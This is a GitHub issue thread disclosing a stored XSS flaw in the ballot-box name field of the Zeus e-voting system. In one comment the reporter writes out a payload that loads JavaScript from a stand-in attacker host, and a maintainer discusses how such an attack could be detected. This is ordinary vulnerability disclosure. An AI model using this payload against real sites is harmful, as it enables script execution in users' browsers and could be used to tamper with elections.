### ISSUE TITLE
XSS in "Όνομα Κάλπης"

### ISSUE THREAD

**Issue by DaKnOb** [grnet/zeus#28]
An XSS vulnerability exists in the `Όνομα Κάλπης` field allowing an ill-intentioned administrator to execute arbitrary JavaScript code in viewers' browsers. More specifically you can test this problem by creating a vote with name `<h1>Kalpi</h1>` and then review the votes. If everything works correctly the `Kalpi` text will appear larger than it should meaning the browser has executed the content as valid HTML.

Attached is a screenshot of a successful Cross Site Scripting Attack against the Demo Zeus deployed at https://zeus.grnet.gr/

![xss-in-zeus](https://cloud.githubusercontent.com/assets/743648/7613878/041e3536-f99c-11e4-99e5-778a620db85c.png)

**Comment by louridas** [comment]
The attack is feasible. It is detectable because any bogus ballot will be shown as such when the ballots are counted.

**Comment by DaKnOb** [comment]
Entering `Real Name<script src="https://malicious.attacker/vote.xss"></script>` will show `Real Name` and execute the script over at `https://malicious.attacker/vote.xss`.

**Comment by louridas** [comment]
If the attacker manages to insert JS into the ballot, the JS will be visible when decrypted (because it is not decrypted via JS) and thus detectable.
